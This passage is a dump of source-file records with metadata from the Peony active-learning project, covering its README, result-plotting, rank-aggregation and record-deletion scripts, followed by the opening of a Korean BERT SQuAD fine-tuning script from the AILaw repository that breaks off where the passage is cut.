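from Peony_database.src.datasets.Tweets_emotions_dataset import (
    COLLECTION_NAME,
    load_data,
    transorm_data,
)

api = MongoDb()
api.load_data_to_database(
    collection_name=COLLECTION_NAME,
    path_to_data=Path("path/to/sentiment140.csv"),
    load_data=load_data,
    transorm_data=transorm_data,
)
```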
{
"alpha_fraction": 0.8003754615783691,
"alphanum_fraction": 0.8003754615783691,
"avg_line_length": 75.04762268066406,
"blob_id": "1a788e1bb54ad99927728e122cdf5ed4182043fc",
"content_id": "21cd9d6f67986327959e5699d798bf5038930d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 902,
"num_lines": 21,
"path": "/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Project\n\n## Active Learning for Text Classification\n\n\n\n### Abstract \n\nFollowing project is aimed on derivation and testing of active learning techniques for text classification. Active learning method is introduced as semi-supervised learning algorithm that uses annotator's help. When an algorithm is not sure about a label of a specific instance, it will ask an annotator to provide the label. On the basis of the iterative annotators feedback the algorithms have more powerful ability for learning with lower amount of training documents. In this work, term classification is interpreted in different ways such as named entity recognition, anomaly context detection, binary classification, multi-class classification, etc.. In order to solve highlighted problems, in this work are used different methods such as random forests, svms, neural networks, etc.. Each method is defined with respect to decision theory paradigm and tested on real data with visualised results.\n\n### Repository Guide\n\nThis Project is separated into two folders *Peony_research_document* and *Peony_project*. \n\n*Peony_research_document* is a folder with output PDF document and .tex, .lyx files.\n\n*Peopny_project* is a tech folder with codes.\n\n### Peony Deployment\n\nIn order to start working with all Peony dependecies `peony_project` environment must be activated. The easiest way to activate peony environmet is to run `conda env create -f environment.yml` (If you don't have conda, please install it before creating environment). \n"
},
{
"alpha_fraction": 0.7174111008644104,
"alphanum_fraction": 0.7192342877388,
"avg_line_length": 31.264705657958984,
"blob_id": "206c7eb34bcbee8d448d5074851e7fbff4120184",
"content_id": "2ae22700a78fc267ee3a347e1f0c359a706a3a3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1097,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/visualize.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom Peony_visualization.src.peony_visualization import visualize_two_auc_evolutions\n\napi = MongoDb()\n\n# Random acquisition function\nsvm_random_sampling_results = api.get_model_results(\n {\n \"model\": \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": \"POSITIVE_EMOTIONS_TWEETS\",\n }\n)\nsvm_random_sampling_results = [\n item for val in svm_random_sampling_results for item in val[\"results\"]\n]\n\n# Entropy acquisition function\nsvm_false_positive_sampling_results = api.get_model_results(\n {\n \"model\": \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": \"POSITIVE_EMOTIONS_TWEETS\",\n }\n)\nsvm_false_positive_sampling_results = [\n item for val in svm_false_positive_sampling_results for item in val[\"results\"]\n]\n\n# we use zero index because database returns list even if it is only one element in list\n\nvisualize_two_auc_evolutions(\n svm_random_sampling_results, svm_false_positive_sampling_results\n)\n"
},
{
"alpha_fraction": 0.5149959325790405,
"alphanum_fraction": 0.5314779877662659,
"avg_line_length": 33.65355682373047,
"blob_id": "a074ee99c6a4c27c0a708a5dbfae7bf5ec5d7403",
"content_id": "9a371974b2227c39310f635c2f54574d7fc1c821",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18505,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 534,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/rank_aggregations.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\nimport pandas as pd\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport math\n\nfrom itertools import chain\nfrom Peony_visualization.src.batch_active_learning_article.result_ids import DATA\nfrom typing import Any, Dict, List, Optional\nfrom matplotlib.ticker import FormatStrFormatter\n\n\ndef plot_batch_evolutions(dfs: List[pd.DataFrame]) -> None:\n\n results = {}\n batches = list(reversed([int(df.columns[1].split(\"_\")[0]) for df in dfs]))\n markevery = 1\n\n algos_2_plot = [\"nn_warm_start_entropy\", \"nn_warm_start_bald\", \"nn_min_margin\", \"mc_dropout_entropy\"]\n\n for df in dfs:\n for _, (algo, algo_mean, algo_std) in df.iterrows():\n if algo in algos_2_plot:\n results.setdefault(algo, {\"mean\": [], \"std\": []})\n results[algo][\"mean\"].append(algo_mean)\n results[algo][\"std\"].append(algo_std)\n\n for algo, stats in results.items():\n stats[\"mean\"] = list(reversed(stats[\"mean\"]))\n stats[\"std\"] = list(reversed(stats[\"std\"]))\n plt.grid(alpha=0.2)\n plt.plot(\n batches,\n stats[\"mean\"],\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=algo,\n alpha=0.4,\n )\n upper_bound = [m + s for m, s in zip(stats[\"mean\"], stats[\"std\"])]\n lower_bound = [m - s for m, s in zip(stats[\"mean\"], stats[\"std\"])]\n plt.plot(batches, upper_bound, linestyle=\"-\", color=\"b\", alpha=0.1)\n plt.plot(batches, lower_bound, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n plt.fill_between(\n batches,\n upper_bound,\n lower_bound,\n alpha=0.05,\n color=\"b\",\n )\n\n plt.show()\n\n\ndef heatmap_batch(\n dfs: List[pd.DataFrame],\n alg_title: Optional[str] = None,\n subplot: Optional[Any] = None,\n label_size: int = 8,\n) -> None:\n df = dfs[0].merge(dfs[1], how=\"left\").merge(dfs[2], how=\"left\").merge(dfs[3], how=\"left\")\n df_h = df[[\"10_ranks_mean\", \"20_ranks_mean\", \"50_ranks_mean\", \"100_ranks_mean\"]]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n if subplot is not None:\n sns.set(font_scale=1.12)\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=[\"10\\n \", \"20\\n \", \"50\\n \", \"100\\n \"],\n yticklabels=[\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"HAC Entropy\\nNN Warm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n \"NN Entropy\\nCold-start\",\n \"NN Random\\nCold-start\",\n ],\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n ax=subplot,\n cbar=False,\n )\n ax.tick_params(labelsize=label_size)\n ax.set_title(\n \"Aggregated batch size mean rank through all algorithms\" if not alg_title else alg_title,\n pad=20,\n fontsize=label_size + 4,\n )\n # ax.set_yticklabels(ax.get_yticklabels(), rotation=40)\n else:\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=[\"10\\n \", \"20\\n \", \"50\\n \", \"100\\n \"],\n yticklabels=[\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n ],\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n )\n 
ax.tick_params(labelsize=label_size)\n ax.set_title(\n f\"Aggregated batch size mean rank through {'all algorithms' if not alg_title else alg_title}\",\n pad=20,\n )\n plt.tight_layout()\n plt.show()\n\n\ndef heatmap_datasets(dfs: List[pd.DataFrame]) -> None:\n\n if len(dfs) == 3:\n df = dfs[0].merge(dfs[1], how=\"left\").merge(dfs[2], how=\"left\")\n\n df_h = df[\n [\n \"Amazon Review 3, 5_ranks_mean\",\n \"Fake news detection_ranks_mean\",\n \"Tweet_emotion_detection_ranks_mean\",\n ]\n ]\n\n xlabels = [\n \"Amazon\\nReviews 3, 5\",\n \"Fake News\\nDetection\",\n \"Twitter\\nSentiment\",\n ]\n\n ylabels = [\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"DEnFi\\nHAC Entropy\",\n \"DEnFi\\nHAC BALD\",\n \"DEnFi\\nEntropy\",\n \"DEnFi\\nBALD\",\n \"DEnFi\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n \"NN Entropy\\nCold-start\",\n \"NN Random\\nCold-start\",\n ]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n sns.set(font_scale=1)\n ax = sns.heatmap(\n df_h.transpose(),\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=ylabels,\n yticklabels=xlabels,\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n # cbar=False if index == 1 else True,\n )\n ax.tick_params(labelsize=10)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45)\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\n # ax.set_title(\"Aggregated mean rank given datasets and algorithm\", pad=20)\n plt.tight_layout()\n plt.show()\n\n else:\n df = (\n dfs[0]\n .merge(dfs[1], how=\"left\")\n .merge(dfs[2], how=\"left\")\n .merge(dfs[3], how=\"left\")\n .merge(dfs[4], how=\"left\")\n )\n\n df_h = df[\n [\n \"Amazon Review 1, 5_ranks_mean\",\n \"Amazon Review 3, 5_ranks_mean\",\n \"Gibberish_ranks_mean\",\n \"Fake news detection_ranks_mean\",\n \"Tweet_emotion_detection_ranks_mean\",\n ]\n ]\n\n xlabels = [\n \"Amazon\\nReviews 1, 5\",\n \"Amazon\\nReviews 3, 5\",\n \"Gibberish\",\n \"Fake News\\nDetection\",\n \"Twitter\\nSentiment\",\n ]\n ylabels = [\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n ]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=xlabels,\n yticklabels=ylabels,\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n )\n ax.tick_params(labelsize=8)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=0)\n # ax.set_yticklabels(ax.get_yticklabels(), rotation=90)\n # ax.set_title(\"Aggregated mean rank given datasets and algorithm\", pad=20)\n plt.tight_layout()\n plt.show()\n\n\ndef get_collection_results() -> Dict[str, List[List[float]]]:\n collection_results = {}\n with open(\"Peony_visualization/src/batch_active_learning_article/collection.json\", \"r\") as f:\n for l in f.readlines():\n data = json.loads(l)\n collection_results[data[\"_id\"][\"$oid\"]] = data[\"results\"]\n return collection_results\n\n\ndef merge_resuls_and_metadata(\n resutls: Dict[str, List[List[float]]], metadata: List[List[str]]\n) -> pd.DataFrame:\n list_2_df: List[Any] = 
[]\n for row in metadata:\n id_res = np.array(resutls[row[0]]).squeeze(2)\n\n batch = re.search(r\"(100|50|20|10)\", row[2])\n batch_span = batch.span() # type: ignore\n batch_int = int(batch.group(0)) # type: ignore\n\n warm_start = re.search(r\"warm_start\", row[2])\n cold_start = re.search(r\"cold_start\", row[2])\n if warm_start:\n alg = row[2][: batch_span[0] - 1] + \"_warm_start_\" + row[3]\n elif cold_start:\n alg = row[2][: batch_span[0] - 1] + \"_cold_start_\" + row[3]\n else:\n alg = row[2][: batch_span[0] - 1] + \"_\" + row[3]\n mean = np.mean(id_res, axis=0)\n std = np.std(id_res, axis=0)\n list_2_df.append(row[0:2] + [alg, batch_int, id_res, mean, std])\n header = [\"id\", \"dataset\", \"algorithm\", \"batch\", \"results\", \"results_mean\", \"results_std\"]\n df = pd.DataFrame(list_2_df)\n df.columns = header\n return df\n\n\ndef get_ranks(df: pd.DataFrame) -> pd.DataFrame:\n results = df[\"results_mean\"].to_list()\n sorted_results = []\n for v in zip(*results):\n res = list(zip(*sorted(zip(*[v, list(range(1, len(v) + 1))]), key=lambda x: x[0], reverse=True)))[1]\n\n sorted_results.append(\n list(zip(*sorted(zip(*[res, list(range(1, len(v) + 1))]), key=lambda x: x[0])))[1]\n )\n transposed_sorted_results = list(zip(*sorted_results))\n\n df = pd.DataFrame(list(zip(df[\"algorithm\"].to_list(), transposed_sorted_results)))\n df.columns = [\"algorithm\", \"ranks\"]\n return df\n\n\ndef aggregate_ranks_through_batches(ranks: List[List[float]], std=False) -> List[float]:\n\n results = []\n for res_list in ranks:\n step = len(res_list) // 10\n for i in range(0, len(res_list), step):\n results.append(res_list[i])\n\n return np.mean(results) if std == False else np.std(results)\n\n\ndef get_batch_rank(df: pd.DataFrame) -> List[pd.DataFrame]:\n df_100 = df[df[\"batch\"] == 100]\n df_50 = df[df[\"batch\"] == 50]\n df_20 = df[df[\"batch\"] == 20]\n df_10 = df[df[\"batch\"] == 10]\n\n def group_by(df: pd.DataFrame, batch_size: str) -> pd.DataFrame:\n df_by_datasets = pd.concat(\n [get_ranks(df[df[\"dataset\"] == dataset]) for dataset in set(df[\"dataset\"].to_list())]\n )\n df_mean = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"])))\n .reset_index()\n )\n df_mean.columns = [\"algorithm\", f\"{batch_size}_ranks_mean\"]\n df_std = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"]), True))\n .reset_index()\n )\n df_std.columns = [\"algorithm\", f\"{batch_size}_ranks_std\"]\n df = df_mean[[\"algorithm\", f\"{batch_size}_ranks_mean\"]]\n df[f\"{batch_size}_ranks_std\"] = df_std[f\"{batch_size}_ranks_std\"]\n return df.round(3)\n\n return [group_by(df_100, \"100\"), group_by(df_50, \"50\"), group_by(df_20, \"20\"), group_by(df_10, \"10\")]\n\n\ndef get_dataset_rank(df: pd.DataFrame) -> List[pd.DataFrame]:\n dfs = [df[df[\"dataset\"] == dataset] for dataset in set(df[\"dataset\"].to_list())]\n\n def group_by(df: pd.DataFrame, dataset: str) -> pd.DataFrame:\n df_by_datasets = pd.concat(\n [get_ranks(df[df[\"batch\"] == batch]) for batch in set(df[\"batch\"].to_list())]\n )\n df_mean = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"])))\n .reset_index()\n )\n df_mean.columns = [\"algorithm\", f\"{dataset}_ranks_mean\"]\n df_std = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"]), True))\n .reset_index()\n 
)\n df_std.columns = [\"algorithm\", f\"{dataset}_ranks_std\"]\n df = df_mean[[\"algorithm\", f\"{dataset}_ranks_mean\"]]\n df[f\"{dataset}_ranks_std\"] = df_std[f\"{dataset}_ranks_std\"]\n return df.round(3)\n\n return [group_by(dataframe, dataset) for dataframe, dataset in zip(dfs, set(df[\"dataset\"].to_list()))]\n\n\ndef get_batch_rank_subplots(df: pd.DataFrame) -> None:\n label_size = 11.2\n heatmap_batch(get_batch_rank(df), \"All Datasets\", plt.subplot(2, 3, 1), label_size)\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Tweet_emotion_detection\"]),\n \"Twitter Sentiment\",\n plt.subplot(2, 3, 2),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Gibberish\"]), \"Gibberish\", plt.subplot(2, 3, 3), label_size\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Amazon Review 3, 5\"]),\n \"Amazon Reviews 3, 5\",\n plt.subplot(2, 3, 4),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Amazon Review 1, 5\"]),\n \"Amazon Reviews 1, 5\",\n plt.subplot(2, 3, 5),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Fake news detection\"]),\n \"Fake News Detection\",\n plt.subplot(2, 3, 6),\n label_size,\n )\n #plt.tight_layout()\n plt.show()\n\n\ndef get_batch_rank_subplots_denfi(df: pd.DataFrame) -> None:\n df_denfi = df[\n (df[\"batch\"] == 20) & (df[\"dataset\"] != \"Gibberish\") & (df[\"dataset\"] != \"Amazon Review 1, 5\")\n ]\n dataset_ranks = get_dataset_rank(df_denfi)\n heatmap_datasets(dataset_ranks)\n # algos = [\n # \"nn_min_margin\",\n # \"denfi_hac_entropy\",\n # \"denfi_hac_bald\",\n # \"denfi_entropy\",\n # \"denfi_bald\",\n # \"denfi_random\",\n # \"mc_dropout_random\",\n # ]\n # first_subplot = [d_r[d_r[\"algorithm\"].isin(algos)] for d_r in dataset_ranks]\n # second_subplot = [d_r[~d_r[\"algorithm\"].isin(algos)] for d_r in dataset_ranks]\n\n # label_size = 13.5\n\n # df = dataset_ranks[0].merge(dataset_ranks[1], how=\"left\").merge(dataset_ranks[2], how=\"left\")\n\n # df_h = df[\n # [\n # \"Amazon Review 3, 5_ranks_mean\",\n # \"Fake news detection_ranks_mean\",\n # \"Tweet_emotion_detection_ranks_mean\",\n # ]\n # ]\n\n # min_v = math.floor(df_h.min().min())\n # max_v = math.floor(df_h.max().max())\n # heatmap_datasets(first_subplot, 1, plt.subplot(1, 2, 1), min_v, max_v)\n # heatmap_datasets(second_subplot, 2, plt.subplot(1, 2, 2), min_v, max_v)\n # # plt.tight_layout()\n plt.show()\n\n\ndef plot_auc_for_batches(df):\n datasets = {\n \"Tweet_emotion_detection\": \"Twitter\\nSentiment\",\n \"Gibberish\": \"Gibberish\\n\",\n \"Amazon Review 3, 5\": \"Amazon\\nReviews 3, 5\",\n \"Amazon Review 1, 5\": \"Amazon\\nReviews 1, 5\",\n \"Fake news detection\": \"Fake News\\nDetection\",\n }\n algorithms = {\n \"nn_min_margin\": \"HAC\\nMin-margin\",\n \"mc_dropout_hac_entropy\": \"MC Dropout\\nHAC Entropy\",\n \"mc_dropout_hac_bald\": \"MC Dropout\\nHAC BALD\",\n \"mc_dropout_entropy\": \"MC Dropout\\nEntropy\",\n \"mc_dropout_bald\": \"MC Dropout\\nBALD\",\n \"mc_dropout_random\": \"MC Dropout\\nRandom\",\n # \"denfi_hac_entropy\": \"DEnFi\\nHAC Entropy\",\n # \"denfi_hac_bald\": \"DEnFi\\nHAC BALD\",\n # \"denfi_entropy\": \"DEnFi\\nEntropy\",\n # \"denfi_bald\": \"DEnFi\\nBALD\",\n # \"denfi_random\": \"DEnFi\\nRandom\",\n \"nn_warm_start_hac_entropy\": \"NN HAC\\nEntropy\\nWarm-start\",\n \"nn_warm_start_entropy\": \"NN Entropy\\nWarm-start\",\n \"nn_warm_start_random\": \"NN Random\\nWarm-start\",\n \"nn_cold_start_entropy\": \"NN Entropy\\nCold-start\",\n 
\"nn_cold_start_random\": \"NN Random\\nCold-start\"\n }\n batches = [10, 20, 50, 100]\n for i, (dataset, dataset_title) in enumerate(datasets.items()):\n ax = plt.subplot(1, 5, i + 1)\n for algo, algo_title in algorithms.items():\n auc_means = [\n round(\n df[(df[\"dataset\"] == dataset) & (df[\"algorithm\"] == algo) & (df[\"batch\"] == batch)][\n \"results_mean\"\n ].tolist()[0][-1],\n 3,\n )\n for batch in batches\n ]\n ax.plot([1, 2, 3, 4], auc_means, linestyle=\"-\", marker=\"+\", markevery=1, lw=1, label=algo_title)\n ax.grid(alpha=0.2)\n ax.set_xlabel(\"Batch size\")\n ax.set_xlim(0.5, 4.5)\n if i == 0:\n ax.set_ylabel(\"AUC\", fontsize=13.5)\n ax.set_title(dataset_title, fontsize=15)\n ax.set_xticklabels([\" \", 10, 20, 50, 100], fontsize=12)\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n\n handles, labels = ax.get_legend_handles_labels()\n plt.figlegend(handles, labels, loc=\"lower center\", ncol=5, fontsize=11)\n plt.subplots_adjust(bottom=0.3)\n plt.show()\n\n\ndef main():\n collection_results = get_collection_results()\n df = merge_resuls_and_metadata(collection_results, DATA)\n df = df[(df[\"algorithm\"] != \"nn_warm_start_hac_bald\") & (df[\"algorithm\"] != \"nn_warm_start_bald\")]\n\n #plot_auc_for_batches(df)\n\n # Without DEnFi\n df_r = df[df[\"algorithm\"].str.match(r\"^denfi\") != True] # In case u want to exclude DEnFi\n\n batch_ranks = get_batch_rank(df_r)\n # plot_batch_evolutions(batch_ranks)\n # heatmap_batch(batch_ranks)\n\n #get_batch_rank_subplots(df_r)\n\n # batch_ranks[0].to_clipboard(header=False, index=False)\n\n # dataset_ranks = get_dataset_rank(df_r)\n # heatmap_datasets(dataset_ranks)\n\n # With data that include DEnFi\n df_denfi = df[\n (df[\"batch\"] == 20) & (df[\"dataset\"] != \"Gibberish\") & (df[\"dataset\"] != \"Amazon Review 1, 5\")\n ]\n dataset_ranks = get_dataset_rank(df_denfi)\n heatmap_datasets(dataset_ranks)\n # dataset_ranks[0].to_clipboard(header=False, index=False)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
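The nested `sorted(zip(...))` calls in `get_ranks` above are dense; this toy trace reproduces the computation for a single iteration, with invented AUC means (the highest mean receives rank 1).

```python
# Per-algorithm mean AUC at one iteration (invented values).
v = (0.71, 0.83, 0.65)

# First sort: algorithm indices ordered by descending AUC -> [2, 1, 3].
by_score = [idx for _, idx in sorted(zip(v, range(1, len(v) + 1)), reverse=True)]

# Second sort: reorder so that position i holds the rank of algorithm i + 1.
ranks = [rank for _, rank in sorted(zip(by_score, range(1, len(v) + 1)))]

assert ranks == [2, 1, 3]  # algorithm 2 had the best AUC, so it gets rank 1
```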
{
"alpha_fraction": 0.6520618796348572,
"alphanum_fraction": 0.6520618796348572,
"avg_line_length": 17.428571701049805,
"blob_id": "db46bcbab81f2294e9152d157482b1fb05be1045",
"content_id": "ced9e074d11cc10b766f58cfab926c81683ea2f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 21,
"path": "/Peony_project/delete_record.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom bson.objectid import ObjectId\n\n\ndef input_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--id\")\n return parser\n\n\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n api.database[\"models_results\"].delete_one({'_id': ObjectId(args.id)})\n\n\nif __name__==\"__main__\":\n main()\n\n"
}
] | 44 |
junho-one/AILaw
|
https://github.com/junho-one/AILaw
|
0865e05457e6864b22157a927f5b5d287e1b4ccb
|
829c02c497aacae3da81f82e9e9f61db352334db
|
c300eb455b7c469fa588072dab6751b92eaed7ac
|
refs/heads/master
| 2023-07-16T20:44:09.962258 | 2021-08-26T02:18:57 | 2021-08-26T02:18:57 | 289,670,685 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.668350100517273,
"alphanum_fraction": 0.6753935217857361,
"avg_line_length": 35.91889572143555,
"blob_id": "556c6b629ec046a813bd0a3a42c28fed0b0cff9b",
"content_id": "383f054b9749c54cdc89c35f27c5a1c5d54eb155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 44207,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 1196,
"path": "/EtriBERT/runningcode/run_squad_ETRI.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\t http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ######################################################################\n# 형태소분석 기반 BERT 모델 MRC Fine-tuning 샘플\n# (original: Hugging-face BERT example code)\n# 수정: joonho.lim\n# 일자: 2019-05-27\n#\n\"\"\"Run BERT on SQuAD.\"\"\"\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport argparse\nimport collections\nimport logging\nimport json\nimport math\nimport os\nimport random\nimport pickle\nfrom tqdm import tqdm, trange\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\n\n############################################\n### joonho.lim @ 2019-03-15\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))\n\nfrom pytorch_pretrained_bert.modeling import BertForQuestionAnswering\nfrom pytorch_pretrained_bert.optimization import BertAdam\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\n\n\n# from utils_squad_evaluate import get_raw_scores\nfrom utils_squad_evaluate import EVAL_OPTS, main as evaluate_on_squad\n\nfrom tokenization_morp import whitespace_tokenize, BasicTokenizer, BertTokenizer\n# from src_tokenizer.tokenization_morp import whitespace_tokenize, BasicTokenizer, BertTokenizer\n\n\n\n\n\n# import evaluate\nimport time\nimport urllib3\n\nlogging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n\t\t\t\t\tdatefmt = '%m/%d/%Y %H:%M:%S',\n\t\t\t\t\tlevel = logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n\n\n# def sentenceTokenizing(content) :\n\t# tokend = Tokenizing[content]\n\t# tokend = tokend[0]\n\t# return tokend\n\nclass SquadExample(object):\n\t\"\"\"A single training/test example for the Squad dataset.\"\"\"\n\n\tdef __init__(self,\n\t\t\t\t qas_id,\n\t\t\t\t q_raw_text,\n\t\t\t\t q_morp_token,\n\t\t\t\t p_raw_text,\n\t\t\t\t p_morp_token,\n\t\t\t\t p_morp_position_list,\n\t\t\t\t a_raw_text=None,\n\t\t\t\t a_morp_token=None,\n\t\t\t\t a_begin_morp=None,\n\t\t\t\t a_end_morp=None):\n\t\tself.qas_id = qas_id\n\t\tself.q_raw_text = q_raw_text\n\t\tself.q_morp_token = q_morp_token\n\t\tself.p_raw_text = p_raw_text\n\t\tself.p_morp_token = p_morp_token\n\t\tself.p_morp_position_list = p_morp_position_list\n\t\tself.a_raw_text = a_raw_text\n\t\tself.a_morp_token = a_morp_token\n\t\tself.a_begin_morp = a_begin_morp\n\t\tself.a_end_morp = a_end_morp\n\t\t\n\t\tself.p_raw_bytes = p_raw_text.encode()\n\t\tself.p_morp_position_list.append ( len(self.p_raw_bytes) 
)\n\t\t\n\t\t##########################################################\n\t\t### joonho.lim @ 2019-03-15\n\t\t### check difference answer span between answer raw text and morphology anlysis boudary \n\t\tif a_raw_text!= None and a_end_morp != None and len(p_morp_position_list) > a_end_morp :\n\t\t\tbegin_pos = p_morp_position_list[a_begin_morp]\n\t\t\tend_pos = p_morp_position_list[a_end_morp+1]\n\t\t\tpred_answer = self.p_raw_bytes[begin_pos:end_pos].decode().strip()\n\t\t\tif self.a_raw_text != pred_answer :\n\t\t\t\tlogger.info ( \"[diff answer span] %s\\t%s\" % (self.a_raw_text, pred_answer) )\n\n\tdef __str__(self):\n\t\treturn self.__repr__()\n\n\tdef __repr__(self):\n\t\ts = \"\"\n\t\ts += \"qas_id: %s\" % (self.qas_id)\n\t\ts += \", question_text: %s\" % (self.q_raw_text)\n\t\ts += \", doc_text: [%s]\" % (self.p_raw_text)\n\t\tif self.start_position:\ts += \", start_position: %d\" % (self.a_begin_morp)\n\t\tif self.start_position:\ts += \", end_position: %d\" % (self.a_end_morp)\n\t\treturn s\n\n\n\n\nclass InputFeatures(object):\n\t\"\"\"A single set of features of data.\"\"\"\n\n\tdef __init__(self,\n\t\t\t\t unique_id,\n\t\t\t\t example_index,\n\t\t\t\t doc_span_index,\n\t\t\t\t tokens,\n\t\t\t\t token_to_orig_map,\n\t\t\t\t token_is_max_context,\n\t\t\t\t input_ids,\n\t\t\t\t input_mask,\n\t\t\t\t segment_ids,\n\t\t\t\t start_position=None,\n\t\t\t\t end_position=None):\n\t\tself.unique_id = unique_id\n\t\tself.example_index = 